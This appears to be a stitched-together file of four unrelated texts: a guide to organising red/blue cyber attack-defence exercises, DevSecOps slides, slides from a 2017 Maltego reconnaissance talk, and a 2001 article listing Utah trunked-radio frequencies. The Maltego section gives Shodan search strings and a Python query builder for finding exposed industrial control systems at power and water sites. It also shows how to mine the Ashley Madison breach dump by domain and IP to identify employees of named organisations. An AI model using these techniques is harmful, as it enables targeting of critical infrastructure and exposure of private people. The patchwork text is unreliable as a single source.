For a practical attack-defense exercise to be implemented successfully, the organizational work covers many aspects: exercise scope, duration, venue, equipment, formation of attack and defense teams, rule-making, video recording, and more.

Exercise scope: give priority to key (non-classified) critical business systems and networks.

Exercise duration: in line with actual business operations, 1–2 weeks is generally recommended.

Exercise venue: choose a venue appropriate to the scale of the exercise, able to accommodate the command center, the attackers, and the defenders, with the three parties' areas kept separate.

Exercise equipment: build the attack-defense exercise platform and video surveillance system, and issue dedicated computers to the attackers.

Attack team formation: staff the teams with the participating units' own personnel or hire professionals from third-party security service providers.

Defense team formation: build the defense teams mainly from each participating unit's own security technical staff, supplemented by hired third-party security professionals.

Exercise rule-making: before the exercise, explicitly formulate the attack rules, defense rules, and scoring rules, so that the attack-defense process is well-founded and the attacks do not cause unnecessary impact on business operations.

Exercise video recording: record the entire exercise on video, as reporting material and as network-security education material, covering exercise preparation, the attack teams' attack process, the defense teams' defense process, and the referee panel's scoring.
Chapter 2: The Four Stages of Organizing a Practical Attack-Defense Exercise

Organizing a practical attack-defense exercise can be divided into four stages:

Planning stage: clarify the goals the exercise is ultimately to achieve, plan all the work, and form a practical, implementable exercise plan that is approved by leadership.

Preparation stage: on the basis of the confirmed implementation plan, prepare resources and personnel, securing people, funds, and materials.

Exercise stage: the core of the whole exercise, in which the organizer coordinates the attack and defense sides and other participating units to complete the exercise work, including exercise launch, exercise execution, and exercise support.

Summary stage: first restore all business systems to their normal operating state, then consolidate the work results to provide a basis for later remediation and construction.

Each stage is introduced in detail below.

1. Planning stage

Whether a practical network attack-defense exercise succeeds depends heavily on planning. The planning stage involves reasonable planning and careful arrangement of six aspects — establishing the exercise organization, determining the exercise targets, formulating the exercise rules, determining the exercise process, building the exercise platform, and emergency safeguard measures — so as to guide the subsequent exercise work.

(1) Establishing the exercise organization

To ensure the exercise proceeds smoothly, a practical attack-defense exercise working group and participating sub-groups are established, typically structured as follows:

[Diagram: exercise organizational structure]

1) Attack group (red team). Composed of attack personnel from the participating units and security vendors, generally penetration testers, code auditors, and intranet penetration specialists. Responsible for attacking the exercise targets.

2) Defense group. Composed of each protected unit's operations technical staff and security operations staff, responsible for monitoring the exercise targets, detecting attack behavior, containing it, and responding and handling it.

3) Technical support group. Its duty is overall monitoring of the attack-defense process, chiefly real-time status monitoring and blocking operations during the exercise, ensuring it proceeds safely and in an orderly manner. The exercise organizer — the purple team — is responsible for maintaining the exercise environment, keeping the exercise IT environment and the exercise monitoring platform running normally.

4) Supervision and evaluation group. The unit leading the exercise forms an expert panel and a referee panel, responsible during the exercise for inspecting the attack status of each attack group (red team), supervising whether attack behavior complies with the exercise rules, and evaluating attack effects. The expert panel studies the overall exercise plan, exercises overall control over attack effects during the exercise, assesses attack results, and keeps the exercise safe and controllable. The referee panel inspects attack and defense status during the exercise, controls the attackers' operations, assigns scores to attack results, and ranks the participating attack teams and defending units on a fair and impartial basis.

5) Organizational support group. Staffed by personnel designated by the exercise organizer, responsible for coordination, liaison, and logistics during the exercise, including emergency response support, venue support, and video capture.

(2) Determining the exercise targets

Based on the effects the exercise needs to achieve, the participating units' businesses and information systems are comprehensively reviewed; targets may be selected by the exercise organizer or reported by the participating units, with the target systems finally selected and confirmed. Critical information infrastructure, important business systems, and portal websites are usually chosen as the first-choice targets.

(3) Formulating the exercise rules

Based on the exercise targets and the actual exercise scenarios, refine the attack rules, defense rules, and scoring rules. To encourage and improve the defending units' defensive skills, bonus-point rules for counterattacks by the defenders may be added as appropriate.

Exercise hours: usually 5×8 hours on working days; the organizing unit may also arrange 7×24 hours as circumstances require.

Communication channels: instant-messaging software, email, telephone, etc.

(4) Determining the exercise process

Once the practical attack-defense exercise formally begins, the process generally proceeds as follows:

1) Confirm personnel are in place. Confirm that the red team members, the exercise organizer, and the defense group members are in place as required.

2) Confirm the exercise environment. The attack group and the technical support group confirm that the exercise site and the exercise platform are ready.

3) Confirm preparations. The defense group confirms the backup status of the participating systems, confirms that the target systems are normal, and that the relevant backup work has been done.

4) Exercise begins. Once all parties confirm that preparations are complete, the exercise formally starts.

5) Attack group carries out attacks. The red teams launch network attacks on the target systems, recording the attack process and evidence of results.

6) Defense group monitors attacks. The defense group can use security devices to monitor network attacks, analyze and confirm detected attack behavior, and record the monitoring data in detail.

7) Submitting results. During the exercise, when red team members find exploitable security vulnerabilities, they capture screenshots of the privileges and results obtained and submit them through the platform.

8) Vulnerability confirmation and assessment. The expert panel confirms the submitted vulnerabilities, verifies their authenticity, and scores them according to the exercise scoring rules.

9) Attack ends. Outside the scheduled exercise hours, attack group members stop attacking the target systems.

10) Results summary. The exercise working group coordinates the participating sub-groups to consolidate the results, problems, and data generated in the exercise and produce the relevant summary reports.

11) Resource recovery. The exercise working group recovers all devices and network resources, recovers and handles the relevant exercise data, and supervises the attack group members in removing trojans, scripts, and other data used during the exercise.

12) Exercise ends. After the attacks on all target systems are finished, the working group also gives an internal summary briefing, and the exercise closes.
(5) Building the exercise platform

To ensure the exercise process is safe and reliable, an attack-defense exercise platform must be built, comprising: the attack site, the defense site, the target information systems, the command hall, and the attack behavior analysis center.

1) Attack site. Attacks may be on-site or off-site; a dedicated network environment is built with ample attack resources. During the formal attack phase, the attack groups launch real network attacks from their designated sites. An attack-defense exercise monitoring system is deployed at the site to help technical experts monitor attack behavior and traffic, ensuring that attacks during the exercise remain safe and controllable.

2) Defense site. The defenders' exercise environment; video surveillance can be deployed to stream the defense work environment back to the command center.

3) Target information systems. The defenders' network asset systems. The defenders carry out the corresponding defensive work on the attacked systems.

4) Attack behavior analysis center. Network security audit devices are deployed to collect and analyze attackers' behavior, monitor the attack process in real time, derive the attack steps through log analysis, build complete attack scenarios, intuitively reflect the state of the attacked hosts, and present everything in real time on a large visual display.

5) Command hall. During the exercise, the real-time status of both attackers and defenders is fed to the monitoring wall in the command hall, where leaders can provide guidance and inspection at any time.

(6) Emergency safeguard measures

These are the contingency plans for handling uncontrollable incidents during the exercise that interrupt or terminate the process. Temporary handling arrangements must be prepared in advance for emergencies that may occur (such as power failure, network outage, or business stoppage). If a participating system develops problems during the exercise, the defenders should take the temporary measures and report immediately to the command center, which notifies the red teams to stop attacking at once. The command center should organize both sides to formulate an emergency response plan for the exercise, with the specific plan detailed in the exercise implementation scheme.

2. Preparation stage

For a practical attack-defense exercise to proceed smoothly and efficiently, two kinds of preparation must be done in advance. The first is resource preparation, involving the venue, the exercise platform, exercise equipment, exercise filing, exercise authorization, confidentiality work, and rule-making; the second is personnel preparation, including the selection, vetting, and team formation of attack and defense personnel.

1) Resource preparation

Venue setup: the exercise display wall, office furniture, the attack teams' network, conference-site arrangement, etc.

Platform setup: open the attack-defense platform, create attacker accounts, allocate IP addresses, create defender accounts, and ensure platform operation.

Dedicated computers: issue dedicated machines with security monitoring software, antivirus software, and screen-recording software installed, establishing an event-replay mechanism.

Video surveillance: deploy surveillance of the exercise site's office environment to safeguard the physical environment.

Exercise filing: the organizer files the exercise with its superior authority and the regulators (public security, cyberspace administration, etc.).

Exercise authorization: the organizer issues formal authorization to the attack teams to ensure the exercise work proceeds in an orderly way within the authorized scope.

Confidentiality agreements: sign confidentiality agreements with the third-party personnel involved in the exercise to ensure information security.

Attack rules: covering the attack teams' access methods, attack hours, attack scope, and reporting of specific attack events; explicitly prohibit attack behavior such as paralyzing business, tampering with information, leaking information, or planting persistent control.

Scoring rules: formulated on the basis of the attack and defense rules. For example, defender scoring rules may include detection, elimination, emergency handling, tracing and attribution, and summary bonus items, as well as deductions; attacker scoring rules may include bonus points for target systems, centralized-control systems, account information, and important critical information systems, as well as deductions for violations.

2) Personnel preparation

Red team: form the attack teams and fix their number, with 3–5 members per team recommended; vet the members' technical skills, backgrounds, and other aspects; appoint a team lead and build the attack side's organizational structure; sign confidentiality agreements; and brief the attackers on the attack rules and the exercise requirements.

Blue team: form the defense teams, deciding whether to use the organization's own personnel as defenders or to bring in third-party personnel; vet the members' technical skills, backgrounds, and other aspects; and appoint a lead and build the defense side's organizational structure. Third-party personnel sign confidentiality agreements, and the defenders are briefed on the defense rules and the exercise requirements.
3. Exercise stage

(1) Exercise launch

The exercise organizer convenes the relevant units for a kickoff meeting to deploy the exercise work, set clear work requirements and constraint measures for both the attack and defense sides, confirm the corresponding contingency plans, fix the exercise schedule, and declare the exercise formally open.

The kickoff meeting marks the start of the whole exercise process. It requires preparing the relevant leaders' remarks; announcing the rules, schedule, and discipline requirements; sign-in and identity verification for the attack and defense personnel; and drawing lots to assign the attackers to groups. The kickoff meeting takes about 30 minutes; ensure that leaders and personnel of the relevant units and departments are present.

(2) Exercise execution

During the exercise, the organizer coordinates the attackers and defenders in carrying out the exercise according to the plan, conducting main tasks that include exercise monitoring, exercise adjudication, and emergency handling.

1) Exercise monitoring. The real-time status and scores of both sides are fed through a secure and reliable channel to the organizer's internal command-and-dispatch wall, where leaders, referees, and monitoring staff can provide guidance and inspection at any time. The running state of the attacked systems, the attackers' operations, the attack results, and the defenders' attack detection and response handling are monitored throughout, giving full command of the entire process and achieving a fair, impartial, and controllable exercise.

2) Exercise adjudication. During the exercise, the results of both the attackers and the defenders are assessed and scored based on their process outcomes. The attacker scoring mechanism includes the actual degree of harm caused to the target systems, accuracy, attack duration, and the number of vulnerabilities contributed; the defender scoring mechanism includes detection of attack behavior, response workflow, defensive measures, and defense time. Comprehensive scoring from multiple angles yields the final scores and rankings of the attackers and defenders.

3) Exercise handling. If an emergency arises during the exercise that the defenders cannot handle effectively, the organizer provides emergency-handling personnel to quickly locate, analyze, and recover the defenders' problems, keeping the exercise systems and related systems running safely and stably and the exercise process controllable.

4) Exercise support.

Personnel integrity: after the exercise starts, conduct daily sign-in and identity checks of the attack and defense personnel to ensure the same people participate throughout, preventing substitutions and keeping the exercise fair and impartial.

Attack process monitoring: once the exercise starts, monitor the attackers' operations through the exercise platform and carry out full network traffic monitoring; monitor the physical environment and personnel throughout via video; and issue a daily report summarizing the exercise.

Expert adjudication: engage expert referees to adjudicate through the exercise platform — confirming attack results, confirming defense results, ruling on violations, etc. — delivering accurate judgments on attack and defense.

Attack replay: cross-check the attackers' submitted results against the attack traffic through the exercise platform, and handle any violations promptly upon discovery.

Information bulletins: use information-exchange tools, such as the Lanxin platform, to set up a command group for unified publication and collection of information, achieving rapid synchronization.

Personnel security: verify the attackers' identities, assign dedicated on-site supervisors, keep an emergency team on standby to handle incidents, and have medical staff on duty during the exercise.

Resource assurance: carry out daily routine checks of devices, systems, and network links.

Logistics: arrange reasonable meals for the exercise personnel, with food and water kept on hand at the site.

Emergency handling: maintain an emergency contact list, execute the contingency plans, and report incidents to the command center.
4. Summary stage

(1) Exercise recovery

After the exercise ends, the relevant safeguard work must be completed — collecting reports, removing backdoors, reclaiming accounts and privileges, recovering devices, restoring the network, and so on — to ensure subsequent normal business runs stably. Specifically:

1) Collect reports. Collect the summary reports submitted by the attackers and defenders and consolidate the information.

2) Remove backdoors. Based on the attackers' reports and the monitored attack traffic, remove the backdoors uploaded by the attackers.

3) Reclaim accounts and privileges. After the attackers submit their reports, reclaim all of their accounts and privileges, including accounts they created on the target systems.

4) Recover the attackers' computers. Format the attackers' machines and wipe the process data.

5) Reclaim network access. Revoke the attackers' network access privileges.

(2) Exercise summary

The exercise summary mainly comprises the participating units writing summary reports, the expert referees consolidating the exercise results, all participating units holding a summary meeting, and editing and publicizing the exercise video. The whole exercise is comprehensively reviewed, discovered problems are actively remediated, and follow-up publicity work demonstrates the practical value of the exercise.

1) Result confirmation. Use the attack results provided by the attackers to confirm which unit or department each compromised target belongs to, and verify the attack results.

2) Data statistics. Consolidate the results of the attackers and defenders, compile the attack-defense data, and produce scores and rankings.

3) Summary meeting. The participating units deliver summary briefings, the organizer gives an overall evaluation of the exercise, the attackers and defenders share experience, trophies and certificates are awarded to outstanding participating teams, and improvement suggestions and remediation plans are proposed for the problems found.

4) Video reporting and publicity. Produce a video of the practical attack-defense exercise for the defenders to play internally for publicity, raising staff security awareness.

(3) Remediation recommendations

After the exercise work is completed, the organizer assembles professional technical staff and experts to consolidate and analyze all the attack data, conduct a full and thorough after-action review, summarize lessons learned, and give reasonable remediation recommendations for the shortcomings, providing the defenders with a targeted, detailed process analysis report. The report is then issued to the participating defending units, which are urged to remediate and to report their remediation results. The defenders should subsequently keep optimizing their protection working model, progressively improve their security protection measures, refine their security policies, strengthen their personnel's technical capabilities, and raise their overall level of network security protection.
Chapter 3: Risk Mitigation Measures for Practical Attack-Defense Exercises

Before a practical attack-defense exercise, constraint measures must be formulated to avoid the risks that may arise, explicitly setting bounding rules for attack-defense operations so that the exercise can be conducted safely within defined limits.

1. The exercise limits the target systems, not the attack paths

During the exercise, attacks may proceed along multiple paths; the attack paths used by the attackers are not restricted. Security vulnerabilities and hidden dangers discovered along an attack path, and the attacks the attackers carry out, should be promptly reported to the exercise command center. Destructive operations against them are not permitted, so as to avoid affecting the normal operation of business systems.

2. Except where authorized, denial-of-service attacks are not allowed

Because the exercise is conducted in the real environment, in order not to affect the normal operation of the attacked targets' business, denial-of-service techniques such as SYN flood and CC attacks are not allowed unless authorized by the exercise host.

3. Notes on web-defacement attacks

Defacement in the exercise is performed only against first- or second-level pages of Internet-facing systems or important applications, in order to test the defenders' emergency response and investigative capabilities. During the exercise, attack teams must focus their penetration on the target systems; after gaining control of a website, they must first request permission from the exercise command center and, once it agrees, post the designated image (issued by the command center) on the specified page. If the target system's Internet site and business applications are tightly protected, the attack team may take business applications closely related to the target system as penetration targets instead.

4. Attack methods prohibited in the exercise

There are also forbidden zones in the attack-defense techniques used in practical exercises. The purpose of setting them is to ensure that the information system security problems discovered through the exercise are genuine and valid. Generally speaking, three kinds of attack methods are prohibited:

1) Attacks carried out by bribing the defenders' personnel;

2) Attacks carried out by physical intrusion, or by cutting into and tapping external fiber;

3) Attack methods that directly affect the target systems' operation, such as radio jammers.

5. Requirements for attackers' use of trojans

Trojan control terminals must use software uniformly provided by the exercise command center. The trojans used must not have destructive functions such as automatically deleting target system files, damaging boot sectors, self-propagating, infecting files, or crashing servers. The use of destructive or infectious viruses and worms is prohibited in the exercise.

6. Blocking and reporting of illegal attacks

To strengthen the monitoring of each attack team's attacks, the attack-defense exercise platform supervises, records, audits, and displays the entire exercise process, preventing the exercise from affecting normal business operations. The exercise command center should organize the technical support units to record and analyze the full attack traffic; upon discovering non-compliant attack behavior, they block the illegal attack, hand it over for manual handling, and issue a notice of criticism to the offending attack team.
Appendix: Qi An Xin's Experience Organizing Practical Attack-Defense Exercises

From 2018 through the first half of 2019, Qi An Xin took part in organizing 56 practical attack-defense exercises, investing 1,463 person-days of work in exercise organization. The organizations for which exercises were organized include ministries, provincial and municipal governments, provincial public security and cyberspace authorities, as well as industry organizations in banking, transportation, energy, people's livelihood, media, healthcare, education, ecology, tobacco, and Internet companies. The exercise target systems covered intranets and extranets, websites, big-data platforms, trading systems, management systems, industrial control systems, financial systems, and other business and production systems.

In the exercises it organized, the privileges of more than 2,300 core business systems and servers — business databases, ERP systems, bastion hosts, domain controllers, test systems, and so on — were found to be obtainable, effectively revealing the participating customers' hidden network security dangers in technology, management, and operations.
Old Bottles and New Wine: Security Across the Full Development Lifecycle
Yang Tingfeng @ DBAPPSecurity (Anheng Information)

The Traditional S-SDLC

Requirements: research; security requirements
Design: threat modeling; secure design
Coding: secure coding; code audit
Testing: test-case design; vulnerability scanning; security testing
Release: baseline checks
Operations: monitoring; incident response
(Business/development team | Operations team)

The Traditional S-SDLC: pain points
(Requirements → Design → Coding → Testing → Release → Operations — the SDLC)

• Hard to close the loop: today's S-SDLC services are document-centric and struggle to close the loop on concrete code-level implementation problems.
• Large investment: in practice, landing the current services requires heavy manpower, yet the content is repetitive work, leaving no time to dig deep for vulnerabilities.
• Hard to accept: some designs may be too specialized for ordinary requirements managers and developers to handle.
• Low data usage: the process produces large volumes of documents that cannot be quickly turned into data and fed into a feedback loop, making it hard to adapt to fast-changing business needs.
DevSecOps

• The classic DevOps framework [diagram]

DevSecOps

• Core idea: everyone is responsible for security; security is pushed deep into the entire software lifecycle.
• Optimize communication and emphasize feedback — across Requirements, Design, Coding, Testing, Release, and Maintenance.

DevSecOps

[CA Veracode survey results]
New Wine for the S-SDLC

Directions of thinking:
1. Automate everything that can be automated
2. Integrate security work into the development process
3. Try to build standardized baselines
4. Turn documents into data
5. Make the process as acceptable and easy to use for developers as possible

New Wine for the S-SDLC

[Toolchain diagram:
• Security requirements: semi-automated generation of the security design — from the functional requirements list to the security design document.
• Closing the loop on security design: an IDE plug-in that syncs the security design list with the platform, provides coding hints, and configures the SDK.
• Source code scanning: local Java code scanning, third-party component scanning, container security scanning, passive application scanning.
• Application security scanning: functional/logic security testing, host vulnerability scanning, quick third-party component scanning, quick container security scanning.
• Asset management: risk signatures, asset risk, source code, application scan results, …
• Report aggregation: vulnerability management, integration with the ticketing system, statistical analysis.]
New Wine for the S-SDLC

[Phase-by-phase activity matrix:
• Requirements: security training; security requirements checklist; checking security requirements against the requirements.
• Design: security design; security review meetings (architecture, components); secure design training; confirmation of the security design.
• Coding: secure coding training; SAST tool checks; component checks; confirmation against the security design checklist; developers' self-checks against the earlier security design; defect data fed back.
• Testing: [core] functional security testing; DAST tool checks; security-testing confirmation; security/specialized testing training; defect data fed back.
• Release: DAST tool checks, SAST tool checks, component checks; release-process confirmation; security-testing confirmation; live statistics, with training plans arranged according to the results; general training throughout; defect data fed back.]
New Wine for the S-SDLC

Integrate with the security operations platform to fully land the DevSecOps technical philosophy:
• Data sharing
• Tooling and automation reduce the required effort
• Data orientation makes analysis and sharing easy
• Attention to developer experience makes the process easy to accept
• Data plus process form a closed loop

Through continuous adjustment, form an S-SDLC landing plan suited to the enterprise itself.

S-SDLC + SecOps + automation + SAST + DAST + training + data = DevSecOps

Thank you!
Yang Tingfeng @ DBAPPSecurity (Anheng Information)
Finding useful and
embarrassing information
with Maltego
ANDREW MACPHERSON
ROELOF TEMMINGH
2017
Agenda
u Intro
u Footprinting - the good the bad and the machines
u Section One:
u Hunting ICS devices online in novel ways
u Section Two:
u Hunting interesting organisations with Databreaches from their networks
u Section Three:
u Identifying individuals at interesting locations
u Questions!
u Beer.
Who am I?
u Andrew MacPherson
u @AndrewMohawk
u 10 yrs at Paterva!
u [email protected]
u Employee number: 00000001
u Tech support -> Webdev -> Win (@Paterva)
u B.Information Science degree (2006)
u With friends like mine…. #draco malfoy #worstfriends #shamecon
u Something about someone with a Maltego hammer
Who was RT?
u Roelof Temmingh
u [email protected]
u (co)Founder SensePost (2000)
u Testing pens for 7 years
u Building tools, writing books, doing talks
u Founder Paterva (2007)
u Managing director
u High level design
u New features
u 14 x BlackHat, 5 x Defcon. Bluehat, Ekoparty, Cansecwest, Ruxcon, etc.
u DCC, UE, FIRST, GovCERT
What is Maltego?
u Tons of tutorials
u Videos too!
HERE BE DEMOS!
u Demo’s rely on:
u Internet connection
u Code working
u Remote API’s working
u Nothing to have changed
u Sacrifices have been made but if you could keep your fingers,
toes and tongues crossed that would help!
u Or you are just gonna get pictures and interpretive dance
Foot printing
101
[Footprinting diagram — entities: Domain, DNS Name, MX, Website, NS, IP Address, Netblock, AS Number. Transforms: Sharing MX, 9 methods for finding DNS names, Sharing NS, TLD expand, Mirror, Resolve IP, Reverse DNS, Historic DNS, DNS Name to Domain, Block in reverse DNS, SPF records, Co-hosted on IP, Netblock to AS, AS to Netblock, 3 methods to take IP to Netblock, Expand Netblock to IPs]
Foot printing
with code
Foot printing
with Buttons
Footprinting
u Gives us:
u Domains
u DNS Names
u IP Addresses
u Netblocks
u AS
u Basic information for targeting
Example
u Energy companies in Las Vegas
u Nevada Energy seems to be the biggest
u NVEnergy.com footprint :)
TLDR; Maltego is awesome for footprinting
ICS devices
u Industrial Control Systems
u Used to operate / automate industrial processes
u Things like:
u Power
u Water
u Manufacturing
u Treatment
u Etc
u Systems you don’t want to break/fall over
Hacking ICS devices
u Not for this talk
u Many talks / Tweets / youtubez
u Targeting
u Devices
u Firewalls
u Protocol
u Etc
u Mostly deal with having access to the
device
u But what if you need to find it first?
ICS Devices … on the Internet?
u They have networking
u Most advise to keep them in an
airgapped lan / offline
u Major Protocols:
u Modbus
u S7
u (Niagara) Fox
u BACnet
u But hopefully there are none
online …right?
Finding ICS devices on shodan
u Google Hacking-esque
u Multiple search strings
u “port: 9600 response code”
u “port:2404 asdu address”
u Results give
u IP Addresses
u Types ( CPU / Model / etc)
u “Locations”
Hunting ICS Devices
u Find all ICS devices
u Try and do attribution
u Is it our target? Yes/No
u This doesn’t really work
u So many different devices/types
u None of them say “NVEnergy main powerplant”
Hunting ICS devices with Maltego and Shodan
u There are many types of ICS
u Instead of doing one let's do all of them at once
u Build “super transform” to find them all
u ? + Search strings
u Domain
u Netblock (net: cidr)
u +whatever shodan keywords
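One way to picture the "super transform": pair a single scoping input with every known fingerprint string and emit one Shodan query per pairing. The fingerprint list below is a small illustrative sample, not the full set used in the talk:

```python
# A few well-known ICS service fingerprints (illustrative, not exhaustive)
ICS_FINGERPRINTS = [
    "port:502",    # Modbus
    "port:102",    # Siemens S7
    "port:1911",   # Niagara Fox
    "port:47808",  # BACnet
]

def ics_queries(scope_filter):
    # scope_filter is a Shodan filter such as "net:192.0.2.0/24"
    # or "hostname:example.com"
    return ["%s %s" % (scope_filter, fp) for fp in ICS_FINGERPRINTS]

for q in ics_queries("net:192.0.2.0/24"):
    print(q)
```

Each resulting string can be fed to the Shodan search API, so one input entity fans out into a query per protocol.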
Hunting ICS Devices
u Instead of finding all, let's feed inputs:
u Domain/Netblock/IP
u Woohoo! Footprinting!
u This doesn’t really work either!
u Nothing in NVEnergy?
u Sometimes you do find it:
u Princeton.edu
u Usc.edu
Hunting ICS Devices
u Okay so footprinting is out, what about
other inputs:
u Geo-location?
u GPS near target->ICS
u Example: Las Vegas!
u Better results
u Manual
u Lucky
Hunting ICS Devices
u Manually finding it is a pain in dense areas
u Isolated area?
u 50.754101, 17.881712
u 3km
Hunting ICS Devices
u One power plant/GPS works okay
u What if we want all of them?
u How do we find their locations?
u GEONAMES!
u Can find places (and their co-ordinates)
based on categories like:
u Power
u Water
u …you see where this is going
Demo: Hunting ICS devices
automatically
u Category (eg “Power”, “Water”,etc)
u Gives us locations on a country level
u Gives us ICS devices for a country!
Hunting ICS Devices
u This relies on how good our GEO2IP is
u Is it good?
u “Sometimes”
u Denser Areas
u Better GEO->IP
u Less populated areas
u Worse, but is that okay?
Breaches
u Footprinting ICS devices lets us find interesting infrastructure to target
u But what about people?
u What about people who work at interesting places
Breaches
u Breaches Happen.
u Breaches are often used to do basic audits of companies
u How many employee’s (based on our domain)
u How many company cards
u Etc etc
u Plenty of work is done on this already via the usual sources ( blogs /
“Big Data” white papers, etc )
u AshMad as an example ->
AshMad? Maltego MDS
u Free Beta at the moment
u I can't speak forever!
u Just one way you could get data in, others:
u Public TDS ( free! )
u Local Transforms ( free! )
u Import Graph from Table ( beer! )
u Requires:
u Datasource ( MySQL / Splunk / MSSQL / etc)
u Query
u Mapping
u Takes each row returned and maps to entities
Fixing Ashley Madison dump
u Ashley Madison dump is great for doing
email->profile
u But it's not really good for doing:
u Domain -> profiles
u Slow, needs a new col referencing the
domain
u Limits subdomains ( you’d need to know
em)
u IP Address -> profiles
u ‘signupip’ field has lots of entries like
‘196.25.1.1,8’
u Can't use LIKE %% as it's too slow
u Netblock -> profiles
u IP addresses are stored as strings
u Need to convert to long
u 68.171.1.1 – 68.171.255.255
u 1152057601 - 1152122879
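The string-to-long conversion the slide describes is a standard trick; the range shown (68.171.1.1–68.171.255.255) maps to 1152057601–1152122879. A minimal Python version:

```python
import socket
import struct

def ip2long(ip):
    # Pack the dotted quad into 4 network-order bytes, then read them
    # back as a single unsigned 32-bit integer
    return struct.unpack("!I", socket.inet_aton(ip))[0]

print(ip2long("68.171.1.1"))      # 1152057601
print(ip2long("68.171.255.255"))  # 1152122879
```

Storing this integer in an indexed column turns a netblock lookup into a fast BETWEEN query instead of a slow string LIKE.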
Ashley Madison dump
u We can interact with it as a “forward”
method via
u Domain -> profile
u Email Address -> profile
u Alias -> profile
u Users don’t register work email
accounts
u (you’d think hey.. State.gov?)
Breaches for interesting targets
u But even if they do.. They definitely
wouldn’t use these sites from work
computers right?
u Footprinting now becomes super
interesting
u Exit Nodes ->
u Wiki Edits ->
u Breach Data ->
u (and the reverse!)
An Example
u CIA.gov
Verification
Shit happens…
But…
u Profile seems too easy
u User / Pass
u Profiles
u etc
u Honeypot? Could be..
Other breaches?
u Friends at SocialLinks
u Many databases
u Let's see what that looks like with our current example…
Other breaches?
u Leaked databases/mail?
u Confirm our footprints!
More People!
u We found ICS devices via GPS
u Found people via footprinting + breaches
u What about people who work at interesting locations? (see 1.)
More People
3 Steps:
1. Find “interesting” places, the same way we did with ICS
u Geonames + country
2. Use twitter to search for GPS
u Geo/search
3. ???
4. Profit
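Step 2 above can be sketched as building the geocode filter that Twitter's (legacy) search API expected — a "lat,long,radius" string. The coordinates are just the example point from earlier; treat the exact API detail as an assumption:

```python
def twitter_geocode(lat, lon, radius_km):
    # Legacy Twitter search accepted a "geocode" parameter formatted as
    # "latitude,longitude,radius" with an explicit unit suffix
    return "%.6f,%.6f,%dkm" % (lat, lon, radius_km)

print(twitter_geocode(50.754101, 17.881712, 3))  # 50.754101,17.881712,3km
```

Feeding each GeoNames result through a helper like this gives one geo search per "interesting place".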
Conclusions
u ICS devices
u Difficult to attribute
u Usually not on the corp network / not visible to Internet
u Easier to find on GPS, but this runs the risk of collateral (which might be okay)
u Breach Data
u Gives a lot more than user details
u Private email addresses (outside org) -> other social networks
u Good for targeting people?
u Exit nodes
u Good for targeting infrastructure as they are likely to have both internal and external
access
Thanks && Questions
u @AndrewMohawk
u [email protected] | pdf |
Olympic-sized Trunking
http://www.signalharbor.com/ttt/01dec/index.html
1 of 8
6/18/2007 14:10
This article first appeared in the December 2001 issue of Monitoring Times.
OLYMPIC-SIZED TRUNKING
The 2002 Winter Olympic Games will begin on February 8, 2002, when
more than two weeks of athletic events will take place in and around Salt
Lake City, Utah. An estimated one and a half million spectators are
expected to attend the Games. As you might imagine, radio will play a big
part in the rapid, smooth and safe functioning of each event. This month I'll
try to describe the major trunked radio networks that will be operating
during the Olympics.
As they have done many times in the past for such large events, the Federal
Communications Commission has delegated the task of radio frequency management and
coordination for the Games. The Salt Lake Organizing Committee (SLOC) will be the
coordinator from December 1, 2001 through March 31, 2002, for the areas in and around
Olympic activities. All broadcasters planning to work in one or more of the four radio zones
(Salt Lake City, Park City, Ogden and Provo) are required to coordinate their use of radio
frequencies through SLOC in order to operate any wireless audio and video, data
communication, two-way or other radio equipment.
Olympic Safety
Besides broadcasters, public safety personnel will be very busy as well.
The federal government has allocated about $200 million for security at the Olympic Winter
Games, with the potential for more after the events of September 11. In addition, the State of
Utah has contributed $35 million and the SLOC budget has more than $30 million earmarked for
safety.
The Secret Service is the lead agency for security planning. The FBI is tasked with intelligence
gathering and law enforcement response, while the Federal Emergency Management Agency
(FEMA) is responsible for "consequence management," meaning they clean up if anything goes
wrong. At the state level, the Utah Olympic Public Safety Command (UOPSC) is responsible for
coordinating the activities of state and local law enforcement.
All told, there will be on the order of 5,000 to 7,000 law enforcement officers at the Games,
along with several thousand additional security personnel hired through SLOC. Military
personnel will also be on hand to provide assistance, so there should be a great deal of public
safety radio activity.
SLOC, in concert with the State of Utah and the Utah Communications Agency Network
(UCAN) has established a plan for their radio system. More than 7,000 two-way radios are
expected to be in use, operating in either the 150 MHz or 800 MHz bands for both short range
(within an event venue) and more distant communication.
Utah Communications Agency Network (UCAN)
UCAN is a quasi-governmental agency created by the Utah State Legislature in 1997 to
construct and operate a modern radio system on behalf of numerous state, local and private
safety organizations. The idea is to transition these users away from older, incompatible systems
in the 150 MHz and 450 MHz bands to a common 800 MHz trunked radio network.
Funding for the roll-out of the system comes from Federal grants, the state coffers, and monthly
user fees of anywhere from $15 to $30 per radio, depending on whether the user is a state agency
or not. In addition, last year Congress approved $5 million for UCAN to upgrade security and
communications equipment for use by law enforcement during the Olympics. Interestingly, the
funding bill also included money to build and operate field-transportable radio direction finding
equipment.
Phase I of the UCAN master plan provides for coverage in Davis, Morgan, Salt Lake, Summit,
Tooele, Utah, Wasatch, and Weber counties, which amounts to about 80 percent of Utah's
population.
Valley Emergency Communications Center
Southwest of Salt Lake City in West Valley City is the Valley Emergency Communications
Center (VECC), which provides dispatch services for 15 fire departments and 8 law enforcement
agencies. 9-1-1 calls from about 20 different municipalities across a 120-square-mile area are
answered at the VECC, averaging 3,500 calls each day. VECC is also the headquarters for
UCAN.
Besides voice, VECC provides data services to police, fire, and rescue units using Cellular
Digital Packet Data (CDPD) technology. Laptop units in vehicles are connected to CDPD
modems and are able to access public safety databases, letting officers run license checks and
warrant requests without the need to talk with a dispatcher.
Future plans include "voiceless dispatch" in which assignments are done over the CDPD
connection rather than by voice. This would free up officers and dispatchers from having to
handle routine messages and allow more information about the assignment to be delivered to the
officer in less time. Information such as mug shots, fingerprints, and photographs could be
delivered at the time of dispatch, allowing the officer to be better prepared for the assignment.
Rather than requiring new base station equipment, the CDPD service uses the existing cellular
telephone network. A vehicle can be equipped with a laptop and CDPD modem for less than
$1800, and monthly service charges from the cellular provider are about $50.
UCAN SmartZone
The UCAN network is a Motorola Type II SmartZone system with a number of sites. Sites are
grouped together into cells, with transmissions being simulcast from each site in a cell. This is a
rather large and complex system, with a lot of frequencies. What follows is a compilation of the
first eleven cells, which handle the majority of calls.
Weber County (cell 1): 866.950, 867.275, 867.300, 867.5875, 867.6125, 867.900, 867.925,
868.2375, 868.2875, 868.9625 and 868.9875 MHz.
Davis County (cell 2): 866.925, 867.175, 867.200, 867.225, 867.450, 867.475, 867.8125,
867.8375 (data), 867.850, 868.150, 868.175, 868.600 and 868.850 MHz.
